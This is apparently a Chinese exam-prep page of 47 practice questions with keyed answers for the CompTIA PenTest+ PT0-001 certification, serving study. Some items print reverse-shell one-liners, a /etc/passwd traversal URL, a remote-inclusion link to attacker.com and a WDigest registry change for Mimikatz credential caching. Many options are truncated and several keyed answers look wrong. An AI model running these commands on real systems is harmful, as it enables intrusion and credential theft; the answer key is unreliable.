不想錯過任何事?

通過認證考試的技巧

最新考試新聞和折扣資訊

由我們的專家策劃和更新

是的,請向我發送時事通訊

CompTIA PT0-001 Exam Questions 2024 Updated:準備考試, CompTIA PenTest+ 認證 | SPOTO

使用我們 2024 年更新的 CompTIA PT0-001 考試試題爲您的 CompTIA PenTest+ (PT0-001) 認證做好準備。使用最新試題進行練習是爲考試做好準備的最佳方法。我們的模擬測試涵蓋一系列主題和場景,包括在雲和移動平臺等新環境中的實踐測試,以及傳統的臺式機和服務器。通過使用我們的考試試題、示例試題和考試轉儲,您將獲得成功所需的知識和信心。我們的模擬考試和考試模擬器可爲您提供真實的考試體驗,進一步提高您的備考水平。訪問我們的考試材料和考試答案,確保您爲 PT0-001 考試做好充分準備,輕鬆獲得 CompTIA PenTest+ 認證。
參加其他線上考試

問題 #1
滲透測試人員向客戶提交網絡應用程序漏洞掃描報告。滲透測試人員將一個漏洞評爲中等嚴重性。在上一份報告中,同一漏洞被報告爲嚴重級別。以下哪項最有可能是嚴重性降低的原因?
A. 戶在未更新版本的情況下應用了熱修復程序。
B. 脅形勢已發生重大變化。
C. 戶更新了代碼庫,增加了新功能。
D. 前還沒有針對此漏洞的已知漏洞利用。
查看答案
正確答案: A
問題 #2
一名滲透測試人員在進行漏洞掃描之前,正在對一些遠程主機進行初步情報搜集。測試人員運行以下命令: nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 以下哪項最能說明指定多個 IP 地址的原因?
A. 絡子網爲 a/25 或更大,測試人員需要訪問兩個不同子網中的主機。
B. 試人員試圖通過加入幾個假地址來執行更隱蔽的掃描。
C. 描儀有多個接口,可按指定速率平衡掃描請求。
D. 第一組地址進行發現掃描,而對後一組主機進行更深入、更積極的掃描。
查看答案
正確答案: A
問題 #3
滲透測試人員在外部漏洞掃描過程中發現了以下結果: 根據上述掃描結果,應優先考慮以下哪種攻擊策略?
A. 期軟件可能包含可被利用的組件。
B. 能採用了薄弱的密碼管理方法。
C. 密技術薄弱的協議可能會被攔截。
D. 絡服務器配置可能會泄露敏感信息。
查看答案
正確答案: D
問題 #4
某公司聘請滲透測試人員確定其新安裝的 VPN 集中器是否存在任何漏洞,該集中器的外部 IP 爲 100.170.60.5。以下哪個命令可以測試 VPN 是否可用?
A. fpipe
B. ike-scan -A -t 1 --sourceip=apoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
查看答案
正確答案: B
問題 #5
滲透測試人員報告說,一個面向互聯網的應用程序只使用了基本身份驗證。以下哪項是最佳修復策略?
A. 用 HTTP 嚴格傳輸安全性。
B. 用安全 cookie 標誌。
C. 密通信信道。
D. 除無效的用戶輸入
查看答案
正確答案: A
問題 #6
首席執行官(CEO)向首席財務官(CFO)發送了一封電子郵件,稱需要通過電匯向一家新供應商付款。雙方都不知道這家供應商,首席執行官也否認發送過這封郵件。這次攻擊使用了以下哪種動機?
A. 懼原則
B. 威原則
C. 缺性原則
D. 似性原則
E. 會證明原則
查看答案
正確答案: B
問題 #7
一名安全評估員完成了對一家公司及其網絡和系統的全面滲透測試。在評估過程中,測試人員在該公司內部網範圍內的薪資網絡應用程序中發現了一個用於 TLS 的加密庫漏洞。然而,供應商尚未對該漏洞進行修補,儘管預計幾天內就會推出修補程序。BEST 可以採取以下哪種策略來降低受影響的風險?
A. 改網絡服務器加密配置,使用更強的密碼套件進行加密、散列和數字籤名。
B. 展新的培訓,以了解訪問應用程序的風險。漏洞修補後,該培訓可停止使用。
C. 施 ACL,限制只有財務部門才能訪問應用程序。修補漏洞後,重新向公司員工開放應用程序。
D. 求工資單用戶更改用於驗證應用程序的密碼。修補漏洞後,再次要求更改密碼。
查看答案
正確答案: C
問題 #8
滲透測試人員被指派對一家公司進行外部滲透評估。以下哪個步驟最有助於被動信息收集過程?(選擇兩個)。
A. 公司大樓外等候,試圖尾隨在一名員工身後。
B. 公司的外部網塊進行漏洞掃描,找出可利用的漏洞,並嘗試獲取訪問權限。
C. 用域名和 IP 註冊網站確定公司的外部網塊和面向外部的應用程序。
D. 社交媒體上搜索信息技術員工,看他們是否會發布有關其工作技術的信息。
E. 別公司面向外部的網絡郵件應用程序,枚舉用戶賬戶並嘗試猜測密碼以獲取訪問權限。
查看答案
正確答案: DE
問題 #9
給出以下腳本:以下哪項最好地描述了該腳本的目的?
A. 誌收集
B. 件收集
C. 鍵監測
D. 試信息收集
查看答案
正確答案: C
問題 #10
在權限有限的 Windows 系統上嘗試維護持久性時,測試人員應使用以下哪個註冊表鍵值?
A. key_classes_root
B. key_local_machine
C. key_current_user
D. key_current_config
查看答案
正確答案: C
問題 #11
一名軟件開發人員希望測試應用程序的代碼是否存在漏洞。軟件開發人員應執行以下哪些流程?
A. 洞掃描
B. 態掃描
C. 態掃描
D. 規掃描
查看答案
正確答案: A
問題 #12
在一次網絡應用評估中,滲透測試人員發現服務器上可以執行任意命令。滲透測試人員想進一步實施攻擊,於是開始探索如何獲得反向 shell,回到位於 192.168.1.5 的攻擊機器。以下哪些是可能的方法?(請選擇兩項)。
A. NC 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
查看答案
正確答案: BC
問題 #13
鑑於以下情況: http://example.com/download.php?id-.../.../.../etc/passwd 以下哪項是對上述攻擊的最佳描述?
A. 意上傳文件攻擊
B. 定向攻擊
C. 錄遍歷攻擊
D. 安全的直接賓語參照攻擊
查看答案
正確答案: C
問題 #14
一家公司與一家專門從事滲透測試的公司籤訂合同,以評估核心業務應用程序的安全性。該公司向該公司提供了一份 Java 字節碼副本。在運行靜態代碼分析器之前,該公司必須採取以下哪些步驟?
A. 過動態代碼分析器運行應用程序。
B. 用模糊測試工具。
C. 編譯應用程序。
D. 查內存分配。
查看答案
正確答案: D
問題 #15
在監控 WAF 日誌時,安全分析員發現了針對以下 URL 的成功攻擊: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php 應採取以下哪些補救措施來防止此類攻擊?
A. 施黑名單。
B. 止 URL 重定向。
C. 參數進行雙 URL 編碼。
D. 止應用程序的外部調用。
查看答案
正確答案: B
問題 #16
一家公司要求滲透測試人員對內部開發的 Android 應用程序的安全性進行審查。滲透測試人員收到了一個 APK 文件以支持評估。滲透測試人員希望在 APK 文件上運行 SAST。滲透測試人員必須首先完成以下哪些準備步驟?(選擇兩項)。
A. 換爲 JAR。
B. 編譯。
C. 叉編譯應用程序。
D. JAR 文件轉換爲 DEX。
E. 新籤署 APK。
F. 接至 ADB。
查看答案
正確答案: AB
問題 #17
最近結束的滲透測試顯示,一個傳統網絡應用程序存在 SQL 注入漏洞。研究表明,要完全修復該漏洞,需要對架構進行更改,而利益相關者不能冒風險保證應用程序的可用性。在這種情況下,以下哪些控制措施是短期的低成本解決方案,可以最大限度地降低 SQL 注入風險?(選擇兩項)。
A. 別並刪除代碼中的內聯 SQL 語句。
B. 別並消除存儲過程中的動態 SQL。
C. 別並清除所有用戶輸入。
D. SQL 語句使用白名單方法。
E. SQL 語句使用黑名單方法。
F. 別惡意輸入的來源並阻止 IP 地址。
查看答案
正確答案: CD
問題 #18
測試期間,在客戶的核心服務器上發現了一個關鍵漏洞。下一步應採取以下哪項措施?
A. 用受影響服務的網絡端口。
B. 成所有調查結果,然後提交給客戶。
C. 時向客戶通報調查結果的詳情。
D. 目標脫機,使其無法被攻擊者利用。
查看答案
正確答案: A
問題 #19
以下哪條命令允許滲透測試人員在 Metasploit 中從互聯網訪問專用網絡?
A. 設置 rhost 192
B. 運行 autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. 使用輔助/服務器/socks4a
查看答案
正確答案: A
問題 #20
一家公司計劃並獲得了聘請顧問執行網絡應用程序滲透測試的預算。發現漏洞後,公司要求顧問執行以下任務:代碼審查 更新防火牆設置 在這種情況下發生了以下哪種情況?
A. 圍蠕變
B. 後審查
C. 受風險
D. 脅預防
查看答案
正確答案: A
問題 #21
客戶要求滲透測試人員評估一個新網絡應用程序的可用性。測試人員應該使用以下哪種類型的攻擊?
A. CP SYN 洪水
B. QL 注入
C. SS
D. MAS 掃描
查看答案
正確答案: B
問題 #22
在 Linux 文件系統上運行以下命令:chmod 4111 /usr/bin/sudo 下列哪些問題現在可能被利用?
A. 核漏洞
B. 性位
C. 報價服務路徑
D. 誤配置 sudo
查看答案
正確答案: B
問題 #23
滲透測試人員在入侵單個工作站後,能夠在整個域內橫向移動,障礙極少。在報告中最好推薦以下哪種緩解策略?(請選擇三項)。
A. 每臺機器隨機設置本地管理員憑據。
B. 用本地管理員的遠程登錄。
C. 求對所有登錄進行多因素身份驗證。
D. 高最低密碼複雜性要求。
E. 用額外的網絡訪問控制。
F. 每個工作站上啓用全磁盤加密。
G. 將每臺主機劃分到自己的 VLAN 中。
查看答案
正確答案: CDE
問題 #24
以下哪項最好地解釋了爲什麼在進行滲透測試時必須對任何已確定的發現保密?
A. 透測試結果通常包含公司知識產權
B. 果公開滲透測試結果,可能會導致消費者不滿。
C. 透測試結果是包含保密信息的法律文件。
D. 透測試結果可幫助攻擊者入侵系統。
查看答案
正確答案: D
問題 #25
滲透測試人員在完成基礎架構方面的工作後,需要對目標公司的員工進行操作系統情報分析。以下哪項是滲透的最佳步驟?
A. 公司打電話,利用社交工程技術獲取員工信息。
B. 訪客戶,假冒工作人員獲取信息。
C. 員工發送欺騙性電子郵件,看員工是否會回復敏感信息。
D. 互聯網上搜索員工信息,如社交網站。
查看答案
正確答案: D
問題 #26
單擊展覽按鈕。 鑑於 Nikto 漏洞和展品中顯示的掃描輸出,以下哪種利用技術可用於利用目標系統?(選擇兩項)。
A. 意執行代碼
B. 話劫持
C. QL 注入
D. 錄憑據暴力破解
E. 站請求僞造
查看答案
正確答案: BD
問題 #27
測試人員打算在目標系統上運行以下命令: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 在測試人員的 Linux 系統上還需要執行以下哪些命令才能成功執行上一條命令?
A. NC -NLVP 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
查看答案
正確答案: D
問題 #28
以下哪個命令可以啓動 Metasploit 數據庫?
A. msfconsole
B. 工作空間
C. msfvenom
D. db_init
E. db_connect
查看答案
正確答案: A
問題 #29
一名安全顧問正試圖使用先前確定的用戶帳戶攻擊一臺設備。正在執行以下哪種類型的攻擊?
A. 證轉儲攻擊
B. LL 注入攻擊
C. 向外殼攻擊
D. 過哈希攻擊
查看答案
正確答案: D
問題 #30
一個軟件開發團隊最近在內部環境中遷移到了新的應用軟件。滲透測試結果顯示存在多個漏洞。如果滲透測試人員無法訪問實時或測試環境,最好在虛擬機上創建相同的環境進行測試。以下哪項對確認最爲重要?
A. 安全的服務和協議配置
B. 行 SMB 和 SMTP 服務
C. 碼複雜性和用戶賬戶薄弱
D. 置錯誤
查看答案
正確答案: A
問題 #31
黑盒滲透測試策略爲測試人員提供了以下功能:
A. 目標清單
B. 網絡圖
C. 源代碼
D. 特權憑證
查看答案
正確答案: D
問題 #32
滲透測試人員正在掃描一個網絡的 SSH,並有一份提供的目標列表。測試人員應該使用下列哪些 Nmap 命令?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
查看答案
正確答案: A
問題 #33
如果安全顧問發現密碼散列類似於以下內容: b117525b345470c29ca3d8ac0b556ba8 以下哪種格式是正確的散列類型?
A. erberos
B. etNTLMv1
C. TLM
D. HA-1
查看答案
正確答案: D
問題 #34
一名工程師在對一個網絡應用程序進行滲透測試時,發現用戶登錄過程使用 HTTP GET 方法從字段數據中發送。爲降低暴露敏感信息的風險,應使用 HTTP GET 方法發送表單:
A. TTP POST 方法。
B. TTP OPTIONS 方法。
C. TTP PUT 方法。
D. TTP TRACE 方法。
查看答案
正確答案: A
問題 #35
在爲一家公司進行安全評估後,發現客戶的測試環境無法使用的時間被計費。客戶聲稱被不公平地收取了費用。在這種情況下,以下哪份文檔最有可能提供指導?
A. 作計劃
B. DA
C. ULAD
查看答案
正確答案: D
問題 #36
在計劃訂婚時,以下哪項最重要?(請選擇兩項)。
A. 標/目的
B. 構圖
C. 衝擊性
D. 告的存儲時間
E. 司政策
查看答案
正確答案: AC
問題 #37
要利用簡單的緩衝區溢出,滲透測試人員需要覆蓋以下哪個 CPU 寄存器?
A. 棧指針寄存器
B. 引指針寄存器
C. 棧基指針
D. 的地索引寄存器
查看答案
正確答案: A
問題 #38
一名滲透測試人員在一個被破壞的 "python -c ' import pty;pty.spawn ("/bin/bash") ' 中運行以下程序。測試人員正在執行以下哪些操作?
A. 除 Bash 歷史記錄
B. 級外殼
C. 建沙盒
D. 取證書
查看答案
正確答案: B
問題 #39
滲透測試人員擁有域控制器的完整 shell,希望發現 21 天內未對域進行身份驗證的任何用戶帳戶。以下哪條命令能最好地實現這一目標?
A. dsrm -users "DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
查看答案
正確答案: D
問題 #40
一名滲透測試人員正試圖通過監控 WPA2-PSK 安全無線網絡捕獲客戶端與接入點之間的握手。測試人員正在監控所識別網絡的正確信道,但未能成功捕獲握手。在這種情況下,以下哪種攻擊能幫助測試人員獲取握手信號?
A. 果報應攻擊
B. 認證攻擊
C. 片攻擊
D. SDI 廣播洪水
查看答案
正確答案: B
問題 #41
一名滲透測試人員在一臺計算機上運行了以下 Nmap 掃描:nmap -aV 192.168.1.5 該組織稱已在其環境中禁用 Telnet。但是,Nmap 掃描結果顯示端口 22 已關閉,端口 23 對 SSH 開放。以下哪項是對所發生情況的最佳解釋?
A. 組織未能禁用 Telnet。
B. map 結果包含端口 23 的誤報。
C. 口 22 已被過濾。
D. 務在非標準端口上運行。
查看答案
正確答案: A
問題 #42
以下哪項是魚叉式網絡釣魚攻擊的示例?
A. 短信攻擊高管
B. 電子郵件攻擊特定團隊
C. USB 密鑰投放隨機用戶
D. 組織爲目標進行灌水攻擊
查看答案
正確答案: A
問題 #43
滲透測試人員希望手動檢查系統中是否存在 "幽靈 "漏洞。以下哪種方法是驗證漏洞的正確方法?
A. GHOST 文件下載到 Linux 系統並編譯 gcc -o GHOST test i:
B. GHOST 文件下載到 Windows 系統並編譯 gcc -o GHOST GHOST
C. GHOST 文件下載到 Linux 系統並編譯 gcc -o GHOST
D. GHOST 文件下載到 Windows 系統並編譯 gcc -o GHOST test i:
查看答案
正確答案: C
問題 #44
一名滲透測試人員正在對一個網絡銀行應用程序進行黑盒評估。測試人員只獲得了登錄頁面的 URL。下面是代碼和輸出結果: 測試人員打算執行以下哪項操作?
A. 平提升權限。
B. 取頁面中的隱藏字段。
C. 析 HTTP 響應代碼。
D. 索 HTTP 標頭
查看答案
正確答案: D
問題 #45
以下哪項最適合對目標的外部域執行被動偵察?
A. 子
B. eWL
C. penVAS
D. 丹
查看答案
正確答案: D
問題 #46
在滲透測試期間,測試人員運行了一個網絡釣魚活動,並從運行 Windows 10 操作系統的內部 PC 收到了一個外殼。測試人員希望使用 Mimikatz 執行憑證收集。以下哪項註冊表更改允許在內存中緩存憑據?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
查看答案
正確答案: A
問題 #47
在滲透測試開始時,測試人員發現了一個包含員工數據的文件,如電子郵件地址、工作電話號碼、計算機名稱和辦公地點。該文件託管在一個公共網絡服務器上。以下哪項最恰當地描述了用於獲取這些信息的技術?
A. 務列舉
B. 集 OSINT
C. 口掃描
D. 會工程學
查看答案
正確答案: B

提交後看答案

請提交您的電子郵件和WhatsApp以獲取問題的答案。

注意:請確保您的電子郵件 ID 和 Whatsapp 有效,以便您獲得正確的考試結果。

電子郵件:
WhatsApp/電話號碼: